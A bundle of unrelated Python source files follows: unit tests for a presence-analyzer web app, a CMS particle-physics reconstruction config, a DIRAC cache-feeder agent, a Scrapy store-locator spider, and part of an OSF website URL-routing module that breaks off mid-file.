self.assertEqual(resp.content_type, 'application/json')
data = json.loads(resp.data)
self.assertEqual(data, [])
def test_template_view(self):
"""
Test template_view view
"""
resp = self.client.get('/presence_weekday.html')
self.assertEqual(resp.status_code, 200)
self.assertIn(resp.content_type, VALID_HTML_MIME)
resp = self.client.get('mean_time_weekday.html')
self.assertEqual(resp.status_code, 200)
self.assertIn(resp.content_type, VALID_HTML_MIME)
resp = self.client.get('/presence_weekday_asdasd.html')
self.assertEqual(resp.status_code, 404)
self.assertIn(resp.content_type, VALID_HTML_MIME)
class PresenceAnalyzerUtilsTestCase(unittest.TestCase):
"""
Utility functions tests.
"""
def setUp(self):
"""
Before each test, set up a environment.
"""
main.app.config.update({'DATA_CSV': TEST_DATA_CSV})
main.app.config.update({'DATA_XML': TEST_DATA_XML})
def tearDown(self):
"""
Get rid of unused objects after each test.
"""
pass
def test_get_data(self):
"""
Test parsing of CSV file.
"""
data = utils.get_data()
self.assertIsInstance(data, dict)
self.assertItemsEqual(data.keys(), [10, 11])
sample_date = datetime.date(2013, 9, 10)
self.assertIn(sample_date, data[10])
self.assertItemsEqual(data[10][sample_date].keys(), ['start', 'end'])
self.assertEqual(data[10][sample_date]['start'],
datetime.time(9, 39, 5))
def test_group_by_weekday(self):
"""
Test grouping by weekday
"""
data = utils.get_data()
user_10 = utils.group_by_weekday(data[10])
self.assertEqual(len(user_10), 7)
self.assertIsInstance(user_10, dict)
for i in xrange(7):
self.assertIn(i, user_10, "Iteration with i=%d" % i)
self.assertIsInstance(user_10[i], list)
self.assertEqual(user_10[0], [])
self.assertIsInstance(user_10[1][0], int)
def test_mean(self):
"""
Test calculation of mean
"""
self.assertEqual(utils.mean([]), 0)
self.assertIsInstance(utils.mean([]), int)
self.assertIsInstance(utils.mean([1, 2, 3]), float)
self.assertEqual(utils.mean([1, 2, 3]), 2)
self.assertEqual(utils.mean([a for a in xrange(-100, 101, -1)]), 0)
self.assertEqual(utils.mean(
[123, 234, 345, 456, 567, 678, 789, 890]), 510.25)
for j in [randint(2, 123) for _ in xrange(randint(2, 123))]:
self.assertEqual(utils.mean(xrange(1, j)), j/2.0,
"Iteration with: a=%s" % j)
def test_seconds_since_midnight(self):
"""
Test secounds since midnight calculation
"""
self.assertEquals(utils.seconds_since_midnight(
datetime.datetime(1, 1, 1)), 0)
self.assertIsInstance(utils.seconds_since_midnight(
datetime.datetime(1, 1, 1)), int)
self.assertEquals(utils.seconds_since_midnight(
datetime.datetime(1, 1, 1)), 0)
self.assertEquals(utils.seconds_since_midnight(
datetime.time(0, 0, 1)), 1)
self.assertEquals(utils.seconds_since_midnight(
datetime.time(12, 0, 0)), 43200)
def test_interval(self):
"""
Test interval calculation
"""
time_delta = datetime.timedelta(hours=4)
dd1 = datetime.datetime(2013, 5, 1, 12, 05, 04)
self.assertIsInstance(utils.interval(dd1-time_delta, dd1), int)
self.assertEqual(utils.interval(dd1-time_delta, dd1),
time_delta.seconds)
dd2 = datetime.datetime(2013, 5, 1, 1, 05, 04)
self.assertEqual(utils.interval(dd2-time_delta, dd2),
time_delta.seconds-24*60*60)
dt_now = datetime.datetime.now()
self.assertEqual(utils.interval(dt_now, dt_now), 0)
dd3 = datetime.time(12, 45, 34)
dd4 = datetime.time(11, 45, 34)
self.assertEqual(utils.interval(dd4, dd3), 60*60)
def test_get_user(self):
"""
Test for reading data from users.xml
"""
users = utils.get_users()
users_items = users.items()
self.assertEqual(len(users), 9)
self.assertIsInstance(users, dict)
self.assertIsInstance(users[122], dict)
self.assertIn(36, users)
self.assertIn(122, users)
self.assertIsInstance(users[122], dict)
self.assertEqual(len(users_items[1][1]), 2)
class PresenceAnalyzerUtilsWithBadDataTestCase(unittest.TestCase):
"""
Utility functions tests.
"""
def setUp(self):
"""
Before each test, set up a environment.
"""
reload(decorators)
reload(utils)
main.app.config.update({'DATA_CSV': BAD_TEST_DATA_CSV})
main.app.config.update({'DATA_XML': BAD_TEST_DATA_XML})
def tearDown(self):
"""
Get rid of unused objects after each test.
"""
pass
@patch.object(utils.log, 'debug')
def test_get_data(self, mock_logger):
"""
Test parsing of CSV file with bad entries
"""
data = utils.get_data()
msg = 'Problem with line %d: '
mock_logger.assert_call_with(msg, 3, exc_info=True)
mock_logger.assert_call_with(msg, 8, exc_info=True)
self.assertIsInstance(data, dict)
self.assertItemsEqual(data.keys(), [10, 11])
self.assertEqual(len(data), 2)
self.assertEqual(len(data[10])+len(data[11]), 9)
def test_get_user(self):
"""
Test for reading data from users.xml with bad entries
"""
with self.assertRaises(AttributeError):
utils.get_users()
class PresenceAnalyzerDecoratorsTestCase(unittest.TestCase):
"""
Decorators functions tests.
"""
def setUp(self):
"""
Before each test, set up a environment.
"""
reload(decorators)
main.app.config.update({'DATA_CSV': TEST_DATA_CSV})
main.app.config.update({'DATA_XML': TEST_DATA_XML})
@patch.object(decorators.log, 'debug')
def test_get_data(self, mock_logger):
"""
Test cache decorator
"""
refresh_msg = 'Refreshing cache for %s'
retrieve_msg = 'Retrieving from cache %s'
data1 = utils.get_data()
key = helpers.generate_cache_key(utils.get_data, (), {})
mock_logger.assert_call_with(refresh_msg % key)
data2 = utils.get_data()
mock_logger.assert_call_with(retrieve_msg % key)
self.assertEqual(data1, data2)
class PresenceAnalyzerHelpersTestCase(unittest.TestCase):
"""
Helpers functions tests.
"""
def test_generate_cache_key(self):
"""
Test generating cache key
"""
key1 = helpers.generate_cache_key(utils.get_users, (), {})
key2 = helpers.generate_cache_key(utils.get_data, (), {})
key3 = helpers.generate_cache_key(utils.interval, (12, 32), {})
key4 = helpers.generate_cache_key(utils.interval, (),
{'end': 12, 'start': 32})
assert1 = 'presence_analyzer.utils.get_users:3527539:133156838395276'
assert2 = 'presence_analyzer.utils.get_data:3527539:133156838395276'
assert3 = 'presence_analyzer.utils.interval:3713076219329978631:' \
'133156838395276'
assert4 = 'presence_analyzer.utils.interval:3527539:' \
'5214707252506937883'
self.assertEqual(key1, assert1)
self.assertEqual(key2, assert2)
self.assertEqual(key3, assert3)
self.assertEqual(key4, assert4)
def suite():
"""
Default test suite.
"""
test_suite = unittest.TestSuite()
test_suite.addTest(unittest.makeSuite(PresenceAnalyzerViewsTestCase))
test_suite.addTest(unittest.makeSuite(PresenceAnalyzerUtilsTestCase))
test_suite.addTest(unittest.makeSuite(
PresenceAnalyzerUtilsWithBadDataTestCase))
test_suite.addTest(unittest.makeSuite(PresenceAnalyzerDecoratorsTestCase))
return test_suite
if __name__ == '__main__':
unittest.main()
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("myRECO")
process.load("FWCore.MessageService.MessageLogger_cfi")
process.load("Configuration.StandardSequences.Services_cff")
process.load("Configuration.StandardSequences.MagneticField_0T_cff")
process.load("Configuration.StandardSequences.GeometryDB_cff")
process.load("Configuration.StandardSequences.Reconstruction_cff")
process.load("SimGeneral.HepPDTESSource.pythiapdt_cfi")
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.load("RecoVertex.BeamSpotProducer.BeamSpot_cfi")
# Timing service
process.Timing = cms.Service("Timing")
# MC Globaltag for 2015 dN/deta analysis
process.GlobalTag.globaltag = 'MCRUN2_74_V8::All'
process.pixelVertexFromClusters = cms.EDProducer('PixelVertexProducerClusters')
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
process.source = cms.Source("PoolSource",
# replace 'myfile.root' with the source file you want to use
fileNames = cms.untracked.vstring(
# 'file:RelVal_MinBias_13TeV_28478DD9-99A9-E411-891C-0025905B861C.root'
#'file:step3_RAW2DIGI_L1Reco_RECO.root'
'file:step3_EPOS_100k.root'
#'RelValMinBias_314_STARTUP31X_V2-v1-Reco.root'
)
)
# Centrality
process.load("RecoHI.HiCentralityAlgos.pACentrality_cfi")
process.pACentrality.producePixelTracks = cms.bool(False)
#process.pACentrality.produceTracks = cms.bool(False)
# Centrality Binning
process.load("RecoHI.HiCentralityAlgos.CentralityBin_cfi")
process.centralityBin.Centrality = cms.InputTag("pACentrality")
process.centralityBin.centralityVariable = cms.string("HFtowers")
process.centralityBin.nonDefaultGlauberModel = cms.string("HydjetDrum5")
# Add the HeavyIon Record: it is for PbPb cent binning, so we shoud not
# trust the centrality bin and only use the variables from the centrality
# provider
process.GlobalTag.toGet.extend([
cms.PSet(record = cms.string("HeavyIonRcd"),
tag = cms.string("CentralityTable_HFtowers200_HydjetDrum5_v740x01_mc"),
connect = cms.untracked.string("frontier://FrontierProd/CMS_COND_31X_PHYSICSTOOLS"),
label = cms.untracked.string("HFtowersHydjetDrum5")
),
])
process.ana = cms.EDAnalyzer('PixelHitAnalyzer',
vertexSrc = cms.vstring('pixelVertexFromClusters'),
trackSrc = cms.untracked.InputTag('generalTracks'),
doTracking = cms.untracked.bool(False),
doCentrality = cms.untracked.bool(True)
)
process.anaStrip = cms.EDAnalyzer('StripHitAnalyzer',
vertexSrc = cms.vstring('pixelVertexFromClusters'),
trackSrc = cms.untracked.InputTag('generalTracks'),
doTracking = cms.untracked.bool(False),
doCentrality = cms.untracked.bool(True),
RecHitCollections = cms.VInputTag(
# cms.InputTag('siStripMatchedRecHits','rphiRecHit'),
cms.InputTag('siStripMatchedRecHits','matchedRecHit')
)
)
#process.SiStripRecHitsAnalyzer = cms.EDAnalyzer('SiStripRecHitsAnalyzer',
# RecHitCollections = cms.VInputTag( cms.InputTag('siStripMatchedRecHits','rphiRecHit'),
# cms.InputTag('siStripMatchedRecHits','stereoRecHit')
# )
#)
#process.load("HeavyIonsAnalysis.EventAnalysis.hievtanalyzer_mc_cfi")
process.load("HLTrigger.HLTanalyzers.HLTBitAnalyser_cfi")
process.hltbitanalysis.UseTFileService = cms.untracked.bool(True)
process.hltanalysis = process.hltbitanalysis.clone(
l1GtReadoutRecord = cms.InputTag("gtDigis"),
l1GctHFBitCounts = cms.InputTag("gctDigis"),
l1GctHFRingSums = cms.InputTag("gctDigis"),
l1extramu = cms.string('l1extraParticles'),
l1extramc = cms.string('l1extraParticles'),
hltresults = cms.InputTag("TriggerResults","","HLT"),
)
process.TFileService = cms.Service('TFileService',
fileName = cms.string('PixelTree-EPOS.root')
)
process.analyze = cms.Path(
process.siPixelRecHits*
process.siStripMatchedRecHits*
process.pixelVertexFromClusters*
# process.hiSelectedVertex*
process.pACentrality*
process.centralityBin*
process.hltanalysis*
# process.hiEvtAnalyzer*
process.ana*
process.anaStrip
# process.SiStripRecHitsAnalyzer
)
|
# $HeadURL: $
''' CacheFeederAgent
This agent feeds the Cache tables with the outputs of the cache commands.
'''
from DIRAC import S_OK#, S_ERROR, gConfig
from DIRAC.AccountingSystem.Client.ReportsClient import ReportsClient
from DIRAC.Core.Base.AgentModule import AgentModule
from DIRAC.Core.DISET.RPCClient import RPCClient
from DIRAC.Core.LCG.GOCDBClient import GOCDBClient
from DIRAC.ResourceStatusSystem.Client.ResourceStatusClient import ResourceStatusClient
from DIRAC.ResourceStatusSystem.Command import CommandCaller
#from DIRAC.ResourceStatusSystem.Utilities import CSHelpers
from DIRAC.ResourceStatusSystem.Utilities import Utils
ResourceManagementClient = getattr(Utils.voimport( 'DIRAC.ResourceStatusSystem.Client.ResourceManagementClient' ),'ResourceManagementClient')
__RCSID__ = '$Id: $'
AGENT_NAME = 'ResourceStatus/CacheFeederAgent'
class CacheFeederAgent( AgentModule ):
'''
The CacheFeederAgent feeds the cache tables for the client and the accounting.
It runs periodically a set of commands, and stores it's results on the
tables.
'''
# Too many public methods
# pylint: disable-msg=R0904
def __init__( self, *args, **kwargs ):
AgentModule.__init__( self, *args, **kwargs )
self.commands = {}
self.clients = {}
self.cCaller = None
self.rmClient = None
def initialize( self ):
self.am_setOption( 'shifterProxy', 'DataManager' )
self.rmClient = ResourceManagementClient()
self.commands[ 'Downtime' ] = [ { 'Downtime' : {} } ]
self.commands[ 'SpaceTokenOccupancy' ] = [ { 'SpaceTokenOccupancy' : {} } ]
#PilotsCommand
# self.commands[ 'Pilots' ] = [
# { 'PilotsWMS' : { 'element' : 'Site', 'siteName' : None } },
# { 'PilotsWMS' : { 'element' : 'Resource', 'siteName' : None } }
# ]
#FIXME: do not forget about hourly vs Always ...etc
#AccountingCacheCommand
# self.commands[ 'AccountingCache' ] = [
# {'SuccessfullJobsBySiteSplitted' :{'hours' :24, 'plotType' :'Job' }},
# {'FailedJobsBySiteSplitted' :{'hours' :24, 'plotType' :'Job' }},
# {'SuccessfullPilotsBySiteSplitted' :{'hours' :24, 'plotType' :'Pilot' }},
# {'FailedPilotsBySiteSplitted' :{'hours' :24, 'plotType' :'Pilot' }},
# {'SuccessfullPilotsByCESplitted' :{'hours' :24, 'plotType' :'Pilot' }},
# {'FailedPilotsByCESplitted' :{'hours' :24, 'plotType' :'Pilot' }},
# {'RunningJobsBySiteSplitted' :{'hours' :24, 'plotType' :'Job' }},
## {'RunningJobsBySiteSplitted' :{'hours' :168, 'plotType' :'Job' }},
## {'RunningJobsBySiteSplitted' :{'hours' :720, 'plotType' :'Job' }},
## {'RunningJobsBySiteSplitted' :{'hours' :8760, 'plotType' :'Job' }},
# ]
#VOBOXAvailability
# self.commands[ 'VOBOXAvailability' ] = [
# { 'VOBOXAvailability' : {} }
#
#Reuse clients for the commands
self.clients[ 'GOCDBClient' ] = GOCDBClient()
self.clients[ 'ReportGenerator' ] = RPCClient( 'Accounting/ReportGenerator' )
self.clients[ 'ReportsClient' ] = ReportsClient()
self.clients[ 'ResourceStatusClient' ] = ResourceStatusClient()
self.clients[ 'ResourceManagementClient' ] = ResourceManagementClient()
self.clients[ 'WMSAdministrator' ] = RPCClient( 'WorkloadManagement/WMSAdministrator' )
self.cCaller = CommandCaller
return S_OK()
def loadCommand( self, commandModule, commandDict ):
commandName = commandDict.keys()[ 0 ]
commandArgs = commandDict[ commandName ]
commandTuple = ( '%sCommand' % commandModule, '%sCommand' % commandName )
commandObject = self.cCaller.commandInvocation( commandTuple, pArgs = commandArgs,
clients = self.clients )
if not commandObject[ 'OK' ]:
self.log.error( 'Error initializing %s' % commandName )
return commandObject
commandObject = commandObject[ 'Value' ]
# Set master mode
commandObject.masterMode = True
self.log.info( '%s/%s' % ( commandModule, commandName ) )
return S_OK( commandObject )
def execute( self ):
for commandModule, commandList in self.commands.items():
self.log.info( '%s module initialization' % commandModule )
for commandDict in commandList:
commandObject = self.loadCommand( commandModule, commandDict )
if not commandObject[ 'OK' ]:
self.log.error( commandObject[ 'Message' ] )
continue
commandObject = commandObject[ 'Value' ]
results = commandObject.doCommand()
if not results[ 'OK' ]:
self.log.error( results[ 'Message' ] )
continue
results = results[ 'Value' ]
if not results:
self.log.info( 'Empty results' )
continue
self.log.verbose( 'Command OK Results' )
self.log.verbose( results )
return S_OK()
################################################################################
#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF
|
import scrapy
import re
import json
from locations.items import GeojsonPointItem
from locations.hours import OpeningHours
class AuBonPainSpider(scrapy.Spider):
name = "aubonpain"
download_delay = 0.5
allowed_domains = [
"www.aubonpain.com",
]
start_urls = (
'https://www.aubonpain.com/stores/all-stores',
)
def parse_hours(self, items):
opening_hours = OpeningHours()
for day in items:
open_time = day["Open"]
close_time = day["Close"]
if close_time == 'Closed' or open_time == 'Closed':
continue
elif close_time == 'Open 24 Hrs' or open_time == 'Open 24 Hrs':
open_time = '12:00 AM'
close_time = '12:00 AM'
elif close_time == 'Open for Special Events':
continue
opening_hours.add_range(day=day["Day"][:2],
open_time=open_time,
close_time=close_time,
time_format='%I:%M %p')
return opening_hours.as_opening_hours()
def parse_store(self, response):
ref = re.findall(r"[^(\/)]+$", response.url)[0]
scripts = "".join(response.xpath('//script/text()').extract())
lat, lon = re.search(r'.*Microsoft.Maps.Location\(([0-9.-]*),\s+([0-9-.]*)\).*', scripts).groups()
address1, address2 = response.xpath('//dt[contains(text(), "Address")]/following-sibling::dd/text()').extract()
city, state, zipcode = re.search(r'^(.*),\s+([a-z]{2})\s+([0-9]+)$', address2.strip(), re.IGNORECASE).groups()
properties = {
'addr_full': address1.strip(', '),
'phone': response.xpath('//dt[contains(text(), "Phone")]/following-sibling::dd/a/text()').extract_first(),
'city': city,
'state': state,
'postcode': zipcode,
'ref': ref,
'website': response.url,
'lat': float(lat),
'lon': float(lon),
}
hours = json.loads(re.search(r'.*var\shours\s*=\s*(.*?);.*', scripts).groups()[0])
hours = self.parse_hours(hours)
if hours:
properties['opening_hours'] = hours
yield GeojsonPointItem(**properties)
def parse(self, response):
urls = response.xpath('//section/div/div//a[contains(@href, "stores")]/@href').extract()
for url in urls:
url = url.replace('\r\n', '')
yield scrapy.Request(response.urljoin(url), callback=self.parse_store)
|
# -*- coding: utf-8 -*-
import os
import httplib as http
from flask import request
from flask import send_from_directory
from framework import status
from framework import sentry
from framework.auth import cas
from framework.routing import Rule
from framework.flask import redirect
from framework.routing import WebRenderer
from framework.exceptions import HTTPError
from framework.auth import get_display_name
from framework.routing import xml_renderer
from framework.routing import json_renderer
from framework.routing import process_rules
from framework.auth import views as auth_views
from framework.routing import render_mako_string
from framework.auth.core import _get_current_user
from modularodm import Q
from modularodm.exceptions import QueryException, NoResultsFound
from website import util
from website import prereg
from website import settings
from website import language
from website.util import metrics
from website.util import paths
from website.util import sanitize
from website import maintenance
from website.models import Institution
from website import landing_pages as landing_page_views
from website import views as website_views
from website.citations import views as citation_views
from website.search import views as search_views
from website.oauth import views as oauth_views
from website.profile import views as profile_views
from website.project import views as project_views
from website.addons.base import views as addon_views
from website.discovery import views as discovery_views
from website.conferences import views as conference_views
from website.preprints import views as preprint_views
from website.institutions import views as institution_views
from website.notifications import views as notification_views
def get_globals():
"""Context variables that are available for every template rendered by
OSFWebRenderer.
"""
user = _get_current_user()
user_institutions = [{'id': inst._id, 'name': inst.name, 'logo_path': inst.logo_path} for inst in user.affiliated_institutions] if user else []
all_institutions = [{'id': inst._id, 'name': inst.name, 'logo_path': inst.logo_path} for inst in Institution.find().sort('name')]
if request.host_url != settings.DOMAIN:
try:
inst_id = (Institution.find_one(Q('domains', 'eq', request.host.lower())))._id
request_login_url = '{}institutions/{}'.format(settings.DOMAIN, inst_id)
except NoResultsFound:
request_login_url = request.url.replace(request.host_url, settings.DOMAIN)
else:
request_login_url = request.url
return {
'private_link_anonymous': is_private_link_anonymous_view(),
'user_name': user.username if user else '',
'user_full_name': user.fullname if user else '',
'user_id': user._primary_key if user else '',
'user_locale': user.locale if user and user.locale else '',
'user_timezone': user.timezone if user and user.timezone else '',
'user_url': user.url if user else '',
'user_gravatar': profile_views.current_user_gravatar(size=25)['gravatar_url'] if user else '',
'user_email_verifications': user.unconfirmed_email_info if user else [],
'user_api_url': user.api_url if user else '',
'user_entry_point': metrics.get_entry_point(user) if user else '',
'user_institutions': user_institutions if user else None,
'all_institutions': all_institutions,
'display_name': get_display_name(user.fullname) if user else '',
'use_cdn': settings.USE_CDN_FOR_CLIENT_LIBS,
'piwik_host': settings.PIWIK_HOST,
'piwik_site_id': settings.PIWIK_SITE_ID,
'sentry_dsn_js': settings.SENTRY_DSN_JS if sentry.enabled else None,
'dev_mode': settings.DEV_MODE,
'allow_login': settings.ALLOW_LOGIN,
'cookie_name': settings.COOKIE_NAME,
'status': status.pop_status_messages(),
'domain': settings.DOMAIN,
'api_domain': settings.API_DOMAIN,
'disk_saving_mode': settings.DISK_SAVING_MODE,
'language': language,
'noteworthy_links_node': settings.NEW_AND_NOTEWORTHY_LINKS_NODE,
'popular_links_node': settings.POPULAR_LINKS_NODE,
'web_url_for': util.web_url_for,
'api_url_for': util.api_url_for,
'api_v2_url': util.api_v2_url, # URL function for templates
'api_v2_base': util.api_v2_url(''), # Base url used by JS api helper
'sanitize': sanitize,
'sjson': lambda s: sanitize.safe_json(s),
'webpack_asset': paths.webpack_asset,
'waterbutler_url': settings.WATERBUTLER_URL,
'login_url': cas.get_login_url(request_login_url),
'reauth_url': util.web_url_for('auth_logout', redirect_url=request.url, reauth=True),
'profile_url': cas.get_profile_url(),
'enable_institutions': settings.ENABLE_INSTITUTIONS,
'keen_project_id': settings.KEEN_PROJECT_ID,
'keen_write_key': settings.KEEN_WRITE_KEY,
'maintenance': maintenance.get_maintenance(),
}
def is_private_link_anonymous_view():
try:
# Avoid circular import
from website.project.model import PrivateLink
return PrivateLink.find_one(
Q('key', 'eq', request.args.get('view_only'))
).anonymous
except QueryException:
return False
class OsfWebRenderer(WebRenderer):
"""Render a Mako template with OSF context vars.
:param trust: Optional. If ``False``, markup-safe escaping will be enabled
"""
def __init__(self, *args, **kwargs):
kwargs['data'] = get_globals
super(OsfWebRenderer, self).__init__(*args, **kwargs)
#: Use if a view only redirects or raises error
notemplate = OsfWebRenderer('', renderer=render_mako_string, trust=False)
# Static files (robots.txt, etc.)
def favicon():
return send_from_directory(
settings.STATIC_FOLDER,
'favicon.ico',
mimetype='image/vnd.microsoft.icon'
)
def robots():
"""Serves the robots.txt file."""
# Allow local robots.txt
if os.path.exists(os.path.join(settings.STATIC_FOLDER,
'robots.local.txt')):
robots_file = 'robots.local.txt'
else:
robots_file = 'robots.txt'
return send_from_directory(
settings.STATIC_FOLDER,
robots_file,
mimetype='text/plain'
)
def goodbye():
# Redirect to dashboard if logged in
if _get_current_user():
return redirect(util.web_url_for('index'))
status.push_status_message(language.LOGOUT, kind='success', trust=False)
return {}
def make_url_map(app):
"""Set up all the routes for the OSF app.
:param app: A Flask/Werkzeug app to bind the rules to.
"""
# Set default views to 404, using URL-appropriate renderers
process_rules(app, [
Rule(
'/<path:_>',
['get', 'post'],
HTTPError(http.NOT_FOUND),
OsfWebRenderer('', render_mako_string, trust=False)
),
Rule(
'/api/v1/<path:_>',
['get', 'post'],
HTTPError(http.NOT_FOUND),
json_renderer
),
])
### GUID ###
process_rules(app, [
Rule(
[
'/<guid>/',
'/<guid>/<path:suffix>',
],
['get', 'post', 'put', 'patch', 'delete'],
website_views.resolve_guid,
notemplate,
),
Rule(
[
'/api/v1/<guid>/',
'/api/v1/<guid>/<path:suffix>',
],
['get', 'post', 'put', 'patch', 'delete'],
website_views.resolve_guid,
json_renderer,
),
])
# Static files
process_rules(app, [
Rule('/favicon.ico', 'get', favicon, json_renderer),
Rule('/robots.txt', 'get', robots, json_renderer),
])
### Base ###
process_rules(app, [
Rule(
'/dashboard/',
'get',
website_views.dashboard,
OsfWebRenderer('home.mako', trust=False)
),
Rule(
'/myprojects/',
'get',
website_views.my_projects,
OsfWebRenderer('my_projects.mako', trust=False)
),
Rule(
'/reproducibility/',
'get',
website_views.reproducibility,
notemplate
),
Rule('/about/', 'get', website_views.redirect_about, notemplate),
Rule('/help/', 'get', website_views.redirect_help, notemplate),
Rule('/faq/', 'get', {}, OsfWebRenderer('public/pages/faq.mako', trust=False)),
Rule(['/getting-started/', '/getting-started/email/', '/howosfworks/'], 'get', website_views.redirect_getting_started, notemplate),
Rule('/support/', 'get', {}, OsfWebRenderer('public/pages/support.mako', trust=False)),
Rule(
'/explore/',
'get',
{},
OsfWebRenderer('public/explore.mako', trust=False)
),
Rule(
[
'/messages/',
],
'get',
{},
OsfWebRenderer('public/comingsoon.mako', trust=False)
),
Rule(
'/view/<meeting>/',
'get',
conference_views.conference_results,
OsfWebRenderer('public/pages/meeting.mako', trust=False),
),
Rule(
'/view/<meeting>/plain/',
'get',
conference_views.conference_results,
OsfWebRenderer('public/pages/meeting_plain.mako', trust=False),
endpoint_suffix='__plain',
),
Rule(
'/api/v1/view/<meeting>/',
'get',
conference_views.conference_data,
json_renderer,
),
Rule(
'/meetings/',
'get',
conference_views.conference_view,
OsfWebRenderer('public/pages/meeting_landing.mako', trust=False),
),
Rule(
'/api/v1/meetings/submissions/',
'get',
conference_views.conference_submissions,
json_renderer,
),
Rule(
'/presentations/',
'get',
conference_views.redirect_to_meetings,
json_renderer,
),
Rule(
'/news/',
'get',
website_views.redirect_to_cos_news,
notemplate
),
Rule(
'/prereg/',
'get',
prereg.prereg_landing_page,
OsfWebRenderer('prereg_landing_page.mako', trust=False)
),
Rule(
'/preprints/',
'get',
preprint_views.preprint_landing_page,
OsfWebRenderer('public/pages/preprint_landing.mako', trust=False),
),
Rule(
'/preprint/',
'get',
preprint_views.preprint_redirect,
notemplate,
),
Rule(
'/api/v1/prereg/draft_registrations/',
'get',
prereg.prereg_draft_registrations,
json_renderer,
),
])
# Site-wide API routes
process_rules(app, [
Rule(
'/citations/styles/',
'get',
citation_views.list_citation_styles,
json_renderer,
),
], prefix='/api/v1')
process_rules(app, [
Rule(
[
'/project/<pid>/<addon>/settings/disable/',
'/project/<pid>/node/<nid>/<addon>/settings/disable/',
],
'post',
addon_views.disable_addon,
json_renderer,
),
Rule(
'/profile/<uid>/<addon>/settings/',
'get',
addon_views.get_addon_user_config,
json_renderer,
),
], prefix='/api/v1')
# OAuth
process_rules(app, [
Rule(
'/oauth/connect/<service_name>/',
'get',
oauth_views.oauth_connect,
json_renderer,
),
Rule(
'/oauth/callback/<service_name>/',
'get',
oauth_views.oauth_callback,
OsfWebRenderer('util/oauth_complete.mako', trust=False),
),
])
process_rules(app, [
Rule(
[
'/oauth/accounts/<external_account_id>/',
],
'delete',
oauth_views.oauth_disconnect,
json_renderer,
)
], prefix='/api/v1')
process_rules(app, [
Rule('/confirmed_emails/', 'put', auth_views.unconfirmed_email_add, json_renderer),
Rule('/confirmed_emails/', 'delete', auth_views.unconfirmed_email_remove, json_renderer)
], prefix='/api/v1')
### Metadata ###
process_rules(app, [
Rule(
[
'/project/<pid>/comments/timestamps/',
'/project/<pid>/node/<nid>/comments/timestamps/',
],
'put',
project_views.comment.update_comments_timestamp,
json_renderer,
),
Rule(
[
'/project/<pid>/citation/',
'/project/<pid>/node/<nid>/citation/',
],
'get',
citation_views.node_citation,
json_renderer,
),
], prefix='/api/v1')
### Forms ###
process_rules(app, [
Rule('/forms/signin/', 'get', website_views.signin_form, json_renderer),
Rule('/forms/forgot_password/', 'get', website_views.forgot_password_form, json_renderer),
Rule('/forms/reset_password/', 'get', website_views.reset_password_form, json_renderer),
], prefix='/api/v1')
### Discovery ###
process_rules(app, [
Rule(
'/explore/activity/',
'get',
discovery_views.activity,
OsfWebRenderer('public/pages/active_nodes.mako', trust=False)
),
])
### Auth ###
process_rules(app, [
# confirm email
Rule(
'/confirm/<uid>/<token>/',
'get',
auth_views.confirm_email_get,
notemplate
),
# reset password get
Rule(
'/resetpassword/<verification_key>/',
'get',
auth_views.reset_password_get,
OsfWebRenderer('public/resetpassword.mako', render_mako_string, trust=False)
),
# reset password post
Rule(
'/resetpassword/<verification_key>/',
'post',
auth_views.reset_password_post,
OsfWebRenderer('public/resetpassword.mako', render_mako_string, trust=False)
),
# resend confirmation get
Rule(
'/resend/',
'get',
auth_views.resend_confirmation_get,
OsfWebRenderer('resend.mako', render_mako_string, trust=False)
),
# resend confirmation post
Rule(
'/resend/',
'post',
auth_views.resend_confirmation_post,
OsfWebRenderer('resend.mako', render_mako_string, trust=False)
),
# user sign up page
Rule(
'/register/',
'get',
auth_views.auth_register,
OsfWebRenderer('public/login.mako', trust=False)
),
# create user account via api
Rule(
'/api/v1/register/',
'post',
auth_views.register_user,
json_renderer
),
# osf login and campaign login
Rule(
[
'/login/',
'/account/'
],
'get',
auth_views.auth_login,
OsfWebRenderer('public/login.mako', trust=False)
),
# osf logout and cas logout
Rule(
'/logout/',
'get',
auth_views.auth_logout,
notemplate
),
# forgot password get
Rule(
'/forgotpassword/',
'get',
auth_views.forgot_password_get,
OsfWebRenderer('public/forgot_password.mako', trust=False)
),
# forgot password post
Rule(
'/forgotpassword/',
'post',
auth_views.forgot_password_post,
OsfWebRenderer('public/forgot_password.mako', trust=False)
),
Rule(
'/login/connected_tools/',
'get',
landing_page_views.connected_tools,
notemplate
),
Rule(
'/login/enriched_profile/',
'get',
landing_page_views.enriched_profile,
notemplate
),
])
### Profile ###
# Web
process_rules(app, [
Rule(
'/profile/',
'get',
profile_views.profile_view,
OsfWebRenderer('profile.mako', trust=False)
),
Rule(
'/profile/<uid>/',
'get',
profile_views.profile_view_id,
OsfWebRenderer('profile.mako', trust=False)
),
# Route for claiming and setting email and password.
# Verification token must be querystring argument
Rule(
['/user/<uid>/<pid>/claim/'],
['get', 'post'],
project_views.contributor.claim_user_form,
OsfWebRenderer('claim_account.mako', trust=False)
),
Rule(
['/user/<uid>/<pid>/claim/verify/<token>/'],
['get', 'post'],
project_views.contributor.claim_user_registered,
OsfWebRenderer('claim_account_registered.mako', trust=False)
),
Rule(
'/settings/',
'get',
profile_views.user_profile,
OsfWebRenderer('profile/settings.mako', trust=False),
),
Rule(
'/settings/account/',
'get',
profile_views.user_account,
OsfWebRenderer('profile/account.mako', trust=False),
),
Rule(
'/settings/account/password',
'post',
profile_views.user_account_password,
OsfWebRenderer('profile/account.mako', trust=False),
),
Rule(
'/settings/addons/',
'get',
profile_views.user_addons,
OsfWebRenderer('profile/addons.mako', trust=False),
),
Rule(
'/settings/notifications/',
'get',
profile_views.user_notifications,
OsfWebRenderer('profile/notifications.mako', trust=False),
),
Rule(
'/settings/applications/',
'get',
profile_views.oauth_application_list,
OsfWebRenderer('profile/oauth_app_list.mako', trust=False)
),
Rule(
'/settings/applications/create/',
'get',
profile_views.oauth_application_register,
OsfWebRenderer('profile/oauth_app_detail.mako', trust=False)
),
Rule(
'/settings/applications/<client_id>/',
'get',
profile_views.oauth_application_detail,
OsfWebRenderer('profile/oauth_app_detail.mako', trust=False)
),
Rule(
'/settings/tokens/',
'get',
profile_views.personal_access_token_list,
OsfWebRenderer('profile/personal_tokens_list.mako', trust=False)
),
Rule(
'/settings/tokens/create/',
'get',
profile_views.personal_access_token_register,
